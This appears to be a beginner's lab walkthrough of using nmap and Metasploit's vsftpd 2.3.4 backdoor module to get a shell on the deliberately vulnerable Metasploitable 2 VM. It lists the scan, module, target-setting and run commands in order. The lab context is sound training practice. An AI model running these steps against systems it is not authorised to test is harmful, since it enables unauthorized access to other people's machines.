Basic Hacking Metasploitable


A basic hack on the Metasploitable 2 machine. Both VMs are running on VMware Player, I’m accessing Kali through Windows Terminal and Metasploitable 2 via PuTTY




Get the IP address for the Metasploitable machine



Run nmap -sS -sV {IP address}

This attack will target port 21, which is running FTP (vsftpd 2.3.4)

vsftpd (Very Secure FTP Daemon) is a fast and secure FTP server used on Linux systems. Version 2.3.4 is a known backdoor vulnerability, easy for pentesting



msfconsole is the main comand-line tool used in the Metasploit Framework. You are able to search, configure, run exploits, payloads and auxiliary modules all from one terminal





Run use 1

Or

use exploit/unix/ftp/vsftpd_234_backdoor



run set rhosts {IP address of the Metasploitable machine}

Followed by…

run




Backdoor server has been spawned means that the exploit is successful and the target is now compromised

Found shell = you’ve broken in – now inside the target system

Session 1 = it’s the first active connection that’s been established

Opened: The connection is live and you are able to interact with the system remotely



Basic Linux commands to show I’m inside the target system

uname -a

And

whoami